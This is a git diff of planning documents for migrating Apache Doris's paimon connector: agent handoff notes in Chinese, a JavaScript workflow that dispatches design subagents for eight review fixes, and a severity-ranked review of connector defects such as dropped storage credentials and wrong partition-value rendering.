不达用户(安全)。 -3. **final review BLOCKER(已修)**:`PluginDrivenScanNode.create` 原直调 `metadata.getTableHandle(remoteName)` **绕过** T18 的 `resolveConnectorTableHandle` seam → sys 表得普通 handle(forceJni=false)→ binlog/audit_log DataSplit 走 native **静默错行**(inert today,翻闸后 live)。修 = `create` 改走 `table.resolveConnectorTableHandle(session, metadata)`(普通表字节等价、sys 表得 sys handle),TDD red→green。**教训**:scan node 有独立 handle 获取面,T18 集中 seam 时漏了它——下轮改 fe-core handle 流时须 grep 全 `metadata.getTableHandle(` 调用方。 -4. **DV-024(B2 遗留缺陷,B4 顺修)**:连接器无 `buildTableDescriptor` override → 普通 paimon plugin 表 toThrift 走 SCHEMA_TABLE fallback(BE `descriptors.cpp:635` SchemaTableDescriptor),legacy+sys 须 HIVE_TABLE(`:644`)。T19 一处 override 同修普通+sys。 +--- -## 🎯 下一 session = B5(MTMV 桥;gated on B4 全完,现满足) +# ▶️ 下一步 — 用户决策:commit + live-e2e → B8 删 legacy → B9 回归 -- **核心任务 = 把 B4 inert 的 E5 接活 + 落 MTMV 桥**。批次依赖见 [tasks/P5](./tasks/P5-paimon-migration.md) §批次依赖。**gated on D2=A(已签)**。 -- **T21(GAP-LISTPART-AT-SNAPSHOT)**:`listPartitions` 加 at-snapshot 重载(按 pin 的 snapshotId 列分区);连接器实现;默认保 latest 向后兼容。单-pin 不变式前提。 -- **T22(fe-core)**:`PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` implements `MTMVRelatedTableIf`+`MTMVBaseTableIf`+`MvccTable`;`loadSnapshot`(`beginQuerySnapshot` 定 snapshotId + at-snapshot 物化分区集**一次**)。**这是 E5 接活点**:须调 `connector.getMetadata().beginQuerySnapshot` + 构造 `ConnectorMvccSnapshotAdapter`(现零构造方);并把 scan-params/time-travel 接到 `PluginDrivenScanNode`(接活后 T19 sys-table fail-loud guard 才生效,否则现 dormant)。 -- **T23**:子类 MTMV 方法(getTableSnapshot→`MTMVSnapshotIdSnapshot`(-1)/getPartitionSnapshot→`MTMVTimestampSnapshot`(缺抛 AnalysisException)/getAndCopyPartitionItems(读 pin 非重列)/getPartitionType/getPartitionColumnNames/isPartitionColumnAllowNull(true)/beforeMTMVRefresh(no-op)/getNewestUpdateVersionOrTime(**绕 pin**))。 -- **T24**:rehome fe-core `PaimonMvccSnapshot`(包 `ConnectorMvccSnapshot` + fe-core 物化 name→PartitionItem/lastModifiedMillis/listed-count);downcast 留 fe-core 内。 -- **T25**:isPartitionInvalid parity(捕 listPartitions count vs 成功构建 PartitionItem count,size 不匹配→UNPARTITIONED 全表刷);MTMV 单-pin 不变式测 + UT。 -- **B5 还须翻 `partition_columns` schema key + 6-arg planScan/requiredPartitions + FE 消费 `listPartitions*`**(B2 遗留前置硬门——`getTableSchema` 现发 `partition_keys`,fe-core `PluginDrivenExternalTable:181` 读 `partition_columns`,FE 现把 paimon 当非分区)。raw-vs-rendered(`listPartitionValues` 返 RAW epoch-day vs legacy TVF RENDERED)须核。 -- **B6**(procedure doc no-op,独立)可随时穿插。 +**全 8 fix IMPL 完,commit 仍 HELD(项目规矩:无用户 ask 不 commit)。** 等用户决定: +1. **commit 分组**:B7 翻闸(core cutover)+ 2 restore + 8 fix + 测 + docs 一并未提交在树。用户定 commit 分组(建议:B7 一组、8 fix 一组或逐 fix 一组)。 +2. **commit 前必 scrub** `regression-test/conf/regression-conf.groovy`(明文 Aliyun key),用 path-whitelist `git add fe/... plan-doc/...`,**勿 `git add -A`**;scratch 勿提交(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。[[catalog-spi-gson-migrate-all-three]] GSON atomic landmine 仍适用。 +3. **live-e2e(CI 跳,需真 infra)**:8 fix 的凭据/原生渲染/HMS-file/REST-vended 路径都列了 gated live 验证(见各 design 尾"Live-e2e"段)。 +4. 之后 → **B8 删 legacy**(`datasource/paimon/*` + 死 `property/metastore/Paimon*`)→ **B9 回归**。 -## ⚙️ 操作须知(复用) +--- -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`(**须 -am**);改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`、改 fe-core `:fe-core`(**fe-core 大,测试用 `-Dtest='PluginDriven*Test' -DfailIfNoTests=false` SCOPE**)。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 -- 连接器禁 import fe-core/fe-common(`org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`;import-gate `bash tools/check-connector-imports.sh`)。**允许** `org.apache.paimon.*`、`org.apache.doris.connector.{api,spi}.*`、**`org.apache.doris.thrift.*`**(thrift provided,MC/paimon 均用)。连接器测试无 mockito(手写 `RecordingPaimonCatalogOps`/`RecordingConnectorContext`/`FakePaimonTable`,测带 WHY+MUTATION);**fe-core 测可用 mockito**;checkstyle 含 test 源、绑 validate。 -- **subagent-driven 节奏(B4 用,B5 复用)**:understand workflow(read-only fan-out 验 plan 前提,**警惕退化 stub**)→ 主线 firsthand 核读 + 用户签决策 → 每 dispatch 用 Agent 工具(非 worktree、共享 dirty tree、顺序 build-on-previous)implement→spec/quality 双审→fix-loop → final holistic Workflow(3 lens 并行:parity/adversarial/scope)+ 主线 firsthand 复跑。**所有 subagent prompt 禁 `git checkout/restore/stash/reset`** + 嘱「不要 commit」。**无 SendMessage 工具**——fix-loop 用新 Agent dispatch(带全上下文)。 -- 翻闸(B7)GSON **7 注册原子齐迁**(5 catalog + db + table→`PaimonPluginDrivenExternalTable` 非裸 base,[[catalog-spi-gson-migrate-all-three]]);删 legacy(B8)后验 paimon-core FE classpath 恰一份([[catalog-spi-be-java-ext-shared-classpath]])。 -- **未跟踪/本地 scratch 勿提交**:`regression-test/conf/regression-conf.groovy`(+`.bak`,含明文凭据)、`.audit-scratch/`、`conf.cmy/`、`.claude/scheduled_tasks.lock`、**`META-INF/`**(本 session 出现的 maven 构建产物,勿 `git add`)。B4 未碰它们。 +# 📦 仓库状态 -## 🧠 给下一个 agent 的 meta +- **HEAD = `d2a2c8d761a`**。working tree **uncommitted**:B7 翻闸 + 2 restore + **8 fix** + 测 + docs + 上一轮 review 产物。 +- **本 session 改的产线文件(7)**:`PaimonCatalogFactory` / `PaimonCatalogOps` / `PaimonConnector` / `PaimonConnectorMetadata` / `PaimonScanPlanProvider`(连接器)+ `ConnectorContext`(SPI)+ `DefaultConnectorContext`(fe-core)。 +- **新测文件(4)**:`PaimonPartitionValueRenderTest` / `PaimonConnectorMetadataStatisticsTest` / `PaimonHmsConfResWiringTest`(连接器)+ `DefaultConnectorContextVendTest`(fe-core)。改测:`PaimonCatalogFactoryTest` / `PaimonScanPlanProviderTest` / `PaimonConnectorMetadataTest` / `PaimonConnectorMetadataMvccTest` / `RecordingPaimonCatalogOps` / `RecordingConnectorContext` / `FakePaimonTable`。 +- **legacy 基线** = `1872ea05310`。迁移链:`512a67ee3ac`(B0)→`807308993fb`(B1)→`a2b765677d1`(B2/B3)→`ae5ad30b938`(B4)→`d2a2c8d761a`(B5/B6);B7 + 8 fix 未 commit。 -- **D1/D2/D4/D5/D6/D7/D-039 已签字**,B0+B1+B2+B3+B4 已落 —— 按设计 doc B5→B9 续。**B4 未提交**(工作树 = 仅 B4 改动)。 -- **live e2e(真实 paimon 各 flavor 环境)= 翻闸真正完成门**(CI 跳)。**B4 新增 live-e2e 硬门**:① `buildTableDescriptor`→HIVE_TABLE 在 BE 真 paimon 普通表+sys 表(离线只到连接器边界,[DV-024]);② MVCC SDK-delegation(`CatalogBackedPaimonCatalogOps` DataTable cast / `earlierOrEqualTimeMills` / `tryGetSnapshot`,离线仅 fake);③ binlog/audit_log 真走 JNI(forceJni 端到端)+ snapshots/schemas sys 表查询;④ sys 表 time-travel fail-loud(须 B5 接活 scan-params/snapshot 后)。累计前批 live 门见 tasks/P5 §当前阻塞项。 -- **B5 最高 correctness 风险**:MTMV 单-pin 不变式(snapshotId 与分区集同源);`lastFileCreationTime()` 跨 flavor 可靠性(SDK 行为,源码不可验,须 live)。 -- auto-memory:[[catalog-spi-p5-paimon-design]](设计)、[[catalog-spi-p5-b1-design]](B1)、[[catalog-spi-p5-b2-design]](B2)、[[catalog-spi-p5-b3-design]](B3)、[[catalog-spi-p5-b4-design]](B4:D-039 E7 机制 + T20 inert + BLOCKER + DV-024)、[[catalog-spi-connector-session-tz-gotcha]](含 paimon 例外)。 +## ⚙️ 操作须知(复用) +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`(`-am` 跨上游模块须带 `-DfailIfNoTests=false`,否则 fe-thrift 报 "No tests were executed");验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。 +- **`-pl :fe-connector-paimon -am` 不重编 fe-core**(连接器不依赖 fe-core);改 `DefaultConnectorContext`/fe-core 须单独 `-pl :fe-core -am` 编/测验证。 +- 连接器禁 import fe-core(`bash tools/check-connector-imports.sh`);单测基建技巧见 [[catalog-spi-fe-core-test-infra]]。 +- cwd 跨 Bash 调用持久,`cd` 会破相对路径 → 一律绝对路径(本 session 踩过一次)。 + +## 🧠 给下一个 agent 的 meta +- 8 fix 的逐条 root-cause + patch + UT + 实现订正已落各 `P5-fix--design.md`(IMPL SUMMARY 段)。复审以各 design 尾为锚。 +- review 报告 [`P5-paimon-fullpath-review-2026-06-11.md`](./reviews/P5-paimon-fullpath-review-2026-06-11.md) 的 file:line 是 review-only 基线(修复后行号已漂移)。 +- 记忆 [[catalog-spi-p5-fullpath-review-result]] 记 review 结论;本 session 的修复执行结论应新增/更新记忆(见下)。 diff --git a/plan-doc/reviews/P5-paimon-fixes-design.workflow.js b/plan-doc/reviews/P5-paimon-fixes-design.workflow.js new file mode 100644 index 00000000000000..7405ceccffd1b4 --- /dev/null +++ b/plan-doc/reviews/P5-paimon-fixes-design.workflow.js @@ -0,0 +1,134 @@ +export const meta = { + name: 'p5-paimon-fixes-design', + description: 'Design docs for the 8 paimon fullpath-review fixes, grounded in current code', + phases: [{ title: 'Design', detail: 'one design subagent per fix, confirms root cause in current code + patch/test plan' }], +} + +const REPORT = 'plan-doc/reviews/P5-paimon-fullpath-review-2026-06-11.md' +const CONNDIR = 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/' +const CONNTEST = 'fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/' +const LEGACY = 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/' + +const COMMON = [ + 'You are a DESIGN subagent. Produce an implementation design for ONE confirmed defect in the Apache Doris paimon connector.', + '', + 'Context: a clean-room review already confirmed this defect. Your job is NOT to re-judge it but to design the fix, grounded in the CURRENT code (read it firsthand — line numbers in the report may have drifted).', + 'The confirmed findings live in: ' + REPORT + ' (read the relevant section).', + 'New connector code: ' + CONNDIR + ' (this module MUST NOT import fe-core — verify your design respects that).', + 'New connector tests: ' + CONNTEST + ' (harness: FakePaimonTable, RecordingPaimonCatalogOps, RecordingConnectorContext, PaimonCatalogFactoryTest, PaimonScanPlanProviderTest, etc.).', + 'Legacy reference (still in tree, port behavior from here for parity): ' + LEGACY, + '', + 'Deliver a design doc (markdown) with EXACTLY these sections:', + '# Problem', + '# Root Cause (confirmed in current code, cite file:line you actually read)', + '# Design (the fix approach; respect connector no-fe-core-import rule; match existing style; minimal change)', + '# Implementation Plan (concrete: which files, which methods, what exact change — pseudocode/snippets ok)', + '# Risk Analysis (parity vs legacy, shared-code blast radius, edge cases)', + '# Test Plan (## Unit Tests — concrete new/extended UT in the connector test dir that FAIL before and PASS after, designed to verify INTENT not just behavior; ## E2E Tests — note if live-only/CI-skipped and why)', + '', + 'Be concrete and correct. Read the actual current code AND the legacy reference before writing. Do NOT modify any code — design only.', +].join('\n') + +const FIXES = [ + { + id: 'FIX-STORAGE-CREDS', + title: 'Storage credentials: canonical s3/oss keys dropped by applyStorageConfig; DLF gate passes but no OSS creds', + detail: [ + 'Read report path 9 (多存储系统接入) findings "s3/oss credentials dropped from Paimon FileIO" and "DLF gate ok but no OSS creds", and path 8 DLF.', + 'Current code: ' + CONNDIR + 'PaimonCatalogFactory.java applyStorageConfig (~:328) + the prefix allow-list (~:75) + DLF assembly. Trace what storage keys Doris users actually pass (canonical s3.access_key / s3.secret_key / s3.endpoint, oss.*) vs the paimon.s3./paimon.fs.oss. prefixes the connector recognizes.', + 'Legacy: ' + LEGACY + 'PaimonExternalCatalog (fs/storage config) — see how legacy propagated storage credentials into the catalog/FileIO Configuration.', + 'Design how to map the canonical Doris storage keys into the paimon Configuration for BOTH the s3/oss filesystem flavor and the DLF flavor, without importing fe-core StorageProperties.', + ].join('\n'), + }, + { + id: 'FIX-REST-VENDED', + title: 'REST vended credentials never delivered to BE (data files unreadable)', + detail: [ + 'Read report path 8 finding "REST vended credentials are never delivered to BE".', + 'Current code: ' + CONNDIR + 'PaimonCatalogFactory.java (REST flavor), PaimonConnectorMetadata.java (getScanNodeProperties / planScan — where per-scan storage properties are emitted to BE), PaimonScanPlanProvider.java, PaimonScanRange.java.', + 'Legacy: ' + LEGACY + 'PaimonVendedCredentialsProvider.java and source/PaimonScanNode.java (where vended creds are fetched per-snapshot and pushed to BE scan ranges).', + 'Design how the connector obtains paimon REST vended credentials and threads them into the scan-node/BE-facing storage properties, matching legacy timing/scope.', + ].join('\n'), + }, + { + id: 'FIX-NATIVE-PARTVAL', + title: 'Native partition-value rendering: port whole serializePartitionValue switch incl. session TZ', + detail: [ + 'Read report path 1 Finding 1.1 + the supplemental "Native-path partition-value rendering" findings (TIME, BINARY/VARBINARY, and the fix-scope finding).', + 'Current code: ' + CONNDIR + 'PaimonScanPlanProvider.java getPartitionInfoMap (~:383-400, the raw values[i].toString()). Also PaimonScanRange.populateRangeParams.', + 'Legacy to port: ' + LEGACY + 'PaimonUtil.java serializePartitionValue (~:566-627) and getPartitionInfoMap (~:545-629) — port the ENTIRE type switch: DATE (LocalDate.ofEpochDay), TIMESTAMP_WITHOUT_TZ, TIMESTAMP_WITH_LOCAL_TIME_ZONE (UTC->session TZ), TIME, FLOAT/DOUBLE; map key Locale.ROOT lowercase; unsupported types (binary) -> skip (omit from map) like legacy returns null.', + 'Determine where the session TimeZone is available to the connector at this point (ConnectorSession) and how legacy obtained it. Respect no-fe-core-import (cannot use fe-core TimeUtils — inline as needed).', + ].join('\n'), + }, + { + id: 'FIX-CPP-READER', + title: 'enable_paimon_cpp_reader ignored + Java-serialized split breaks BE paimon-cpp deserialize', + detail: [ + 'Read the supplemental finding "Connector ignores enable_paimon_cpp_reader and Java-serializes the split, breaking BE paimon-cpp deserialize".', + 'Current code: ' + CONNDIR + 'PaimonScanPlanProvider.java (split building / serialization), PaimonScanRange.java (populateRangeParams / what is sent to BE), PaimonTableHandle.java.', + 'Legacy: ' + LEGACY + 'source/PaimonScanNode.java and source/PaimonSplit.java — find how legacy honored enable_paimon_cpp_reader (session var) and chose the split serialization format (java-serialized vs cpp/native) accordingly.', + 'Design how the connector reads the enable_paimon_cpp_reader session flag and selects the matching split serialization so BE cpp reader can deserialize.', + ].join('\n'), + }, + { + id: 'FIX-TZ-ALIAS', + title: 'FOR TIME AS OF fails under CST(default)/PST/EST: inline 4-entry tz alias map', + detail: [ + 'Read report path 3 finding "FOR TIME AS OF datetime-string fails under session time_zone CST/PST/EST".', + 'Current code: ' + CONNDIR + 'PaimonConnectorMetadata.java parseTimestampMillis (~:538-547) where ZoneId.of(session.getTimeZone()) is called with no alias map.', + 'Legacy: fe/fe-core/src/main/java/org/apache/doris/common/util/TimeUtils.java timeZoneAliasMap (~:58-116) — it has exactly 4 entries (confirm them). Legacy resolves via ZoneId.of(tz, timeZoneAliasMap).', + 'Design a tiny inline alias constant in the connector (cannot import fe-core TimeUtils) that maps those 4 aliases before ZoneId.of, still failing loud on truly-unknown ids. Confirm the exact 4 entries from current TimeUtils.', + ].join('\n'), + }, + { + id: 'FIX-HMS-CONFRES', + title: 'HMS hive.conf.resources (external hive-site.xml) silently dropped at catalog creation', + detail: [ + 'Read report path 8 finding "HMS hive.conf.resources (external hive-site.xml) is silently dropped at catalog creation".', + 'Current code: ' + CONNDIR + 'PaimonCatalogFactory.java (HMS flavor assembly) and fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonHMSMetaStoreProperties.java (still live).', + 'Legacy: ' + LEGACY + 'PaimonHMSExternalCatalog.java / PaimonExternalCatalog.java — how legacy loaded hive.conf.resources (paths to hive-site.xml etc.) into the HiveConf.', + 'Design how to honor hive.conf.resources in the new HMS catalog assembly. Note which side (connector vs fe-core property class) is the right place given the no-import rule.', + ].join('\n'), + }, + { + id: 'FIX-TABLE-STATS', + title: 'getTableStatistics not overridden -> base-table row count always -1', + detail: [ + 'Read the supplemental finding "Paimon connector never overrides getTableStatistics so base-table row count is always UNKNOWN minus 1".', + 'Current code: ' + CONNDIR + 'PaimonConnectorMetadata.java (does it override getTableStatistics from the ConnectorMetadata SPI?), PaimonCatalogOps.java. Check fe/fe-connector/fe-connector-api/.../ConnectorMetadata.java and ConnectorTableStatistics.java for the SPI shape.', + 'Legacy: ' + LEGACY + 'PaimonExternalTable.java (fetchRowCount / getRowCount) and PaimonUtil — how legacy computed the base-table row count (sum of snapshot record counts).', + 'Design the getTableStatistics override returning the paimon snapshot row count.', + ].join('\n'), + }, + { + id: 'FIX-READ-NOTNULL', + title: 'Read path propagates paimon NOT NULL; legacy always forced columns nullable', + detail: [ + 'Read report path 10 finding "Read path propagates paimon NOT NULL to Doris column; legacy always forced columns nullable".', + 'Current code: ' + CONNDIR + 'PaimonConnectorMetadata.java mapFields + PaimonTypeMapping.java (where nullability is set on the Doris column).', + 'Legacy: ' + LEGACY + 'PaimonUtil.java type mapping — confirm legacy forced isAllowNull=true on every column regardless of paimon nullability, and WHY (BE read-path expectation).', + 'Design restoring the legacy nullable behavior on the read path. Flag clearly whether this is a pure parity restore or whether propagating NOT NULL is actually desirable (give the tradeoff for the user to confirm).', + ].join('\n'), + }, +] + +const SCHEMA = { + type: 'object', + properties: { + id: { type: 'string' }, + designMarkdown: { type: 'string' }, + filesTouched: { type: 'array', items: { type: 'string' } }, + rootCauseConfirmed: { type: 'boolean' }, + notes: { type: 'string' }, + }, + required: ['id', 'designMarkdown', 'filesTouched', 'rootCauseConfirmed', 'notes'], +} + +phase('Design') +log('Designing ' + FIXES.length + ' fixes, grounded in current code.') +const designs = await parallel(FIXES.map(fx => () => + agent(COMMON + '\n\n# FIX: ' + fx.id + '\n## ' + fx.title + '\n\n' + fx.detail, + { label: 'design:' + fx.id, phase: 'Design', schema: SCHEMA }) +)) + +return { designs: designs.filter(Boolean) } diff --git a/plan-doc/reviews/P5-paimon-fullpath-review-2026-06-11.md b/plan-doc/reviews/P5-paimon-fullpath-review-2026-06-11.md new file mode 100644 index 00000000000000..9d840dc7f30b9e --- /dev/null +++ b/plan-doc/reviews/P5-paimon-fullpath-review-2026-06-11.md @@ -0,0 +1,533 @@ +# P5 paimon 全功能路径 clean-room 对抗 review — findings (2026-06-11) + +## Executive Summary + +本次 clean-room 对抗 review 覆盖 paimon connector 迁移的 13 条主审路径 + 5 个补充审查领域。每个 BLOCKER/MAJOR finding 经过 3-lens 对抗验证(new-code-correctness / legacy-parity / reproducibility),另含一个 completeness critic 评估。 + +### Findings 按严重度统计 + +| 严重度 | 数量 | +|---|---| +| BLOCKER | 6 | +| MAJOR | 8 | +| MINOR | 18 | +| NIT | 3 | + +(主审 13 路 + 补充 5 领域合计:BLOCKER 6、MAJOR 8、MINOR 18、NIT 3,共 35 findings。此表由 workflow 结构化原始数据精确统计;synthesis agent 初稿漏计补充审查的 BLOCKER/MAJOR(原写 5/6/13),编排者已据 raw findings 校正。) + +### Verify 阶段裁决(BLOCKER/MAJOR,3-lens) + +共有 14 个 BLOCKER/MAJOR finding 进入对抗验证(主审 9 + 补充 5)。结果:**11 CONFIRMED、3 PARTIAL-heavy、0 DOWNGRADED**(无一被多数 lens 驳回)。 + +- **CONFIRMED(三裁全确认,真实缺陷)**:11 个 + 1. [P1] Native-reader DATE/TIMESTAMP_LTZ 分区值裸 toString — BLOCKER(3/0/0 CONFIRMED) + 2. [P3] FOR TIME AS OF 在 CST/PST/EST session 下失败 — MAJOR(3/0/0 CONFIRMED) + 3. [P8] REST vended credentials 不下发 BE — BLOCKER(3/0/0 CONFIRMED) + 4. [P8] HMS hive.conf.resources 静默丢弃 — MAJOR(3/0/0 CONFIRMED) + 5. [P9] s3/oss 凭据从 Paimon FileIO 丢失 — BLOCKER(3/0/0 CONFIRMED) + 6. [P9] DLF gate 通过但无 OSS 凭据 — BLOCKER(3/0/0 CONFIRMED) + 7. [P10] Read 路径传播 paimon NOT NULL — MAJOR(3/0/0 CONFIRMED) + 8. [补充] getTableStatistics 缺 override,行数恒为 -1 — MAJOR(3/0/0 CONFIRMED) + 9. [补充] enable_paimon_cpp_reader 被忽略,Java 序列化破坏 BE cpp deserialize — BLOCKER(3/0/0 CONFIRMED) + 10. [补充] BINARY/VARBINARY 分区列裸 Java array identity 渲染 — MAJOR(3/0/0 CONFIRMED) + 11. [补充] native 渲染修复须移植整个 serializePartitionValue switch(含 session timeZone),非仅 DATE+TIMESTAMP_LTZ — MAJOR(3/0/0 CONFIRMED) + +- **PARTIAL(三裁全 PARTIAL,真分歧但影响/场景被夸大,未降级但需注意)**:1 个 + - [P7] Native-path DV 文件路径未归一化 — BLOCKER(0/0/3 PARTIAL):真实存在归一化缺失,但主文件路径同样未归一化,故失败模式应为"主文件读取响亮报错"而非 finding 所述"DV 静默丢弃、已删行复现"。 + +- **DOWNGRADED(多数 lens 被驳回)**:0 个 + - 注:没有任何 BLOCKER/MAJOR finding 被多数驳回(majorityRefuted)。但有 1 个 MAJOR 在三裁中得到 1 CONFIRMED / 2 PARTIAL(见下),严格意义未达 majorityRefuted,但其失败场景已被多数 lens 质疑。 + +- **混合(1 CONFIRMED + 2 PARTIAL,真分歧但默认配置下不成立)**:1 个 + - [P8] Paimon JDBC driver_url 绕过安全 allow-list — MAJOR(1/0/2 PARTIAL):分歧真实存在(连接器确实丢失 allow-list 强制 + URL 格式校验),但默认配置下 legacy 也加载任意 jar,只有在管理员加固配置(非默认 jdbc_driver_secure_path / 非空 white_list)时才构成可利用绕过。 + +### 补充审查中的重定性说明(编排者按原始裁决校正) + +- [补充] Native ORC/Parquet read: path_partition_keys 未发出 — completeness critic 假设为 BLOCKER(BE 把分区列当文件列 → 错行),但该领域专项 review 经 BE 代码追踪后自评为 **MINOR**:BE 在 table-format reader 路径从 columns_from_path_keys(新代码确实发出)独立重建分区列,与 slot category / num_of_columns_from_file 无关,未能构造错行场景。仅 FE 侧 parity 分歧 + 潜在脆弱性。 +- [补充] Native-path 分区渲染范围扩展 — **三个子 finding 的裁决并不一致**(synthesis 初稿误并为"均 PARTIAL",编排者据 raw verdict 校正): + - **TIME_WITHOUT_TIME_ZONE 裸 micros/millis 整数渲染 — MAJOR,0/0/3 PARTIAL**:legacy 在 TIME 上本身就崩(`(Long)` cast 抛 CCE),且两侧都把 TIME 映射为 UNSUPPORTED 致投影/谓词不可达,故"legacy 正确、新代码错"的对比不成立——真实渲染分歧但场景被夸大。 + - **BINARY/VARBINARY 裸 Java array identity 渲染 — MAJOR,3/0/0 CONFIRMED**:三裁确认为真实缺陷(legacy 跳过该类型、不发 columnsFromPath;新代码发出 `[B@hash` 垃圾)。 + - **修复范围 — MAJOR,3/0/0 CONFIRMED**:三裁确认 native 渲染修复须移植整个 serializePartitionValue switch(含 session timeZone),非仅 Finding 1.1 的 DATE+TIMESTAMP_LTZ。 + +### 单一最高优先级真实缺陷 + +**[P9] s3/oss 凭据从 Paimon FileIO 丢失(BLOCKER,3/0/0 CONFIRMED)** 与并列同级的 **[P8] REST vended credentials 不下发**、**[P9] DLF gate 通过但无 OSS 凭据**、**[P1] native-reader DATE 分区值裸 toString** 共同构成最高优先级的真实数据/可用性缺陷。其中 **s3/oss 凭据丢失**影响面最广:`applyStorageConfig` 只识别 `paimon.s3.`/`paimon.s3a.`/`paimon.fs.s3.`/`paimon.fs.oss.` 四个前缀,而 Doris 官方文档/regression 用例(test_paimon_s3.groovy)使用的规范键 `s3.access_key`/`s3.secret_key`/`s3.endpoint` 被静默丢弃,导致 filesystem flavor + 私有 S3/OSS 桶的 paimon catalog 在 live cutover 路径上零凭据、读取失败。 + +--- + +## Per-path Findings + +### 路径 1. 基础读取 (normal scan) + +覆盖说明:normal-scan 路径两侧端到端追踪。谓词下推(EQ/NE/LT/LE/GT/GE/IN/NOT IN/IS [NOT] NULL/LIKE-prefix)、FLOAT-drop quirk、CHAR-drop、TIMESTAMP-without-tz 固定 UTC、LTZ-no-push、forceJni gate(binlog/audit_log)、empty-pin scan-all guard、supportsCastPredicatePushdown=false 均与 legacy 语义一致。JNI serialized-table/predicate 路径匹配。 + +#### Finding 1.1 — Native-reader DATE / TIMESTAMP_WITH_LOCAL_TIME_ZONE 分区列值裸 Object.toString() 渲染 → native ORC/Parquet 分区表扫描的列值错误(数据损坏) + +- **Severity**: BLOCKER +- **New**: `fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java:383-400`(getPartitionInfoMap;缺陷在 :396 `String value = values[i] != null ? values[i].toString() : null;`) +- **Legacy**: `fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonUtil.java:545-629`(getPartitionInfoMap + serializePartitionValue),消费于 `source/PaimonScanNode.java:457`(setPaimonPartitionValues on native splits)和 :313-333(columnsFromPath) +- **Difference**: paimon 分区列不物理存于 ORC/Parquet 原始文件;native reader 由 BE 从 columnsFromPath 物化(PaimonScanRange.populateRangeParams:213-226)。Legacy serializePartitionValue 按类型渲染:DATE = `LocalDate.ofEpochDay(Integer).format(ISO_LOCAL_DATE)` → "2024-01-01";TIMESTAMP_WITHOUT_TZ = `Timestamp.toLocalDateTime().format(ISO_LOCAL_DATE_TIME)`;TIMESTAMP_WITH_LOCAL_TIME_ZONE = UTC→session-TZ 转换的 ISO datetime;FLOAT/DOUBLE 经 Float/Double.toString。新代码对 `RowDataToObjectArrayConverter.convert(partition).get(i)` 直接 `.toString()`,无类型处理。DATE 产出 boxed Integer(epoch-days),故渲染为 "19723" 而非 "2024-01-01";TIMESTAMP_WITH_LOCAL_TIME_ZONE 渲染原始 UTC 墙钟(无 session-TZ shift)。(TIMESTAMP_WITHOUT_TZ 恰好匹配,因 `Timestamp.toString()==toLocalDateTime().toString()==ISO_LOCAL_DATE_TIME`。)次要:map key 用原始 paimon 分区键(`partitionKeys.get(i)`)而 legacy 用 Locale.ROOT 小写;不支持类型(如 binary)legacy 返回 null(跳过 columnsFromPath)而新代码发出 `[B@hash` 垃圾。 +- **failureScenario**: CREATE 一个 DATE 列分区的 paimon 表,数据文件为 ORC/Parquet(native-reader eligible:非 binlog/audit_log,forceJni=false,全部 .orc/.parquet)。`SELECT date_part_col FROM t`(或任意谓词)。native reader 对每行从 columnsFromPath = "19723"(epoch days)填充 → 每个分区每行显示垃圾/错误日期(或解析错误),而 legacy 返回正确的 "2024-01-01"。非 UTC session 下 TIMESTAMP_WITH_LOCAL_TIME_ZONE 分区列同类错误。 +- **suggestion**: 将 legacy serializePartitionValue 移植入 connector(只需 paimon DataType + session TimeZone,均已可得):DATE 经 LocalDate.ofEpochDay,TIMESTAMP_WITHOUT_TZ 经 toLocalDateTime().format,TIMESTAMP_WITH_LOCAL_TIME_ZONE 经 UTC→session-TZ,FLOAT/DOUBLE 经 Float/Double.toString;map key 用 Locale.ROOT 小写;不支持类型返回空 map(legacy 返回 null → 无 columnsFromPath)而非 Object.toString()。 +- **Verify 裁决**: **CONFIRMED 3 / REFUTED 0 / PARTIAL 0**。new-code-correctness 端到端确认 DATE Integer epoch-day → "19723";legacy-parity 确认;reproducibility 经 BE partition_column_filler.h text-serde 解析路径 + native 默认 gate(force_jni_scanner 默认 false)确认可达。三裁均判 DATE 案为 BLOCKER 合理。 + +#### Finding 1.2 — COUNT(*) pushdown(merged-row-count / tableLevelRowCount)被静默丢弃 + +- **Severity**: MINOR +- **New**: `PaimonScanPlanProvider.java:148-255`(planScan 从不检查 COUNT agg / DataSplit.mergedRowCount() / 设置 paimon.row_count;PaimonScanRange.populateRangeParams:203-208 始终 tableLevelRowCount=-1) +- **Legacy**: `source/PaimonScanNode.java:396-495`(applyCountPushdown / dataSplit.mergedRowCountAvailable() / setPushDownCount / assignCountToSplits) +- **Difference**: legacy 检测 `getPushDownAggNoGroupingOp()==COUNT` 并在 DataSplit 暴露 merged row count 时发出 count-only splits(携 tableLevelRowCount),使 BE 免扫描返回计数。新 connector 完全无 count-pushdown 路径(类 Javadoc 列了 "COUNT pushdown" 为支持路径但无实现)。结果仍正确(全扫描 + BE 聚合),仅更慢;tableLevelRowCount 恒为 -1 故无 count 损坏。 +- **failureScenario**: `SELECT COUNT(*) FROM paimon_table` 全数据扫描而非返回预计算 merged row counts → 大表性能回退(无错误结果)。 +- **suggestion**: 若需 count-pushdown parity,经 SPI 暴露 agg-pushdown 信号并重实现 merged-row-count split 发出;否则更新类 Javadoc 移除 COUNT-pushdown 声明。 + +#### Finding 1.3 — Native-reader 不对大原始文件做 sub-split(每文件单 scan range),native ranges 省略 selfSplitWeight + +- **Severity**: MINOR +- **New**: `PaimonScanPlanProvider.java:220-245`(每 RawFile 一个 PaimonScanRange:start=0,length=file.length();native Builder 不设 selfSplitWeight) +- **Legacy**: `source/PaimonScanNode.java:434-469`(determineTargetFileSplitSize + fileSplitter.splitFile 产生多个 start/length 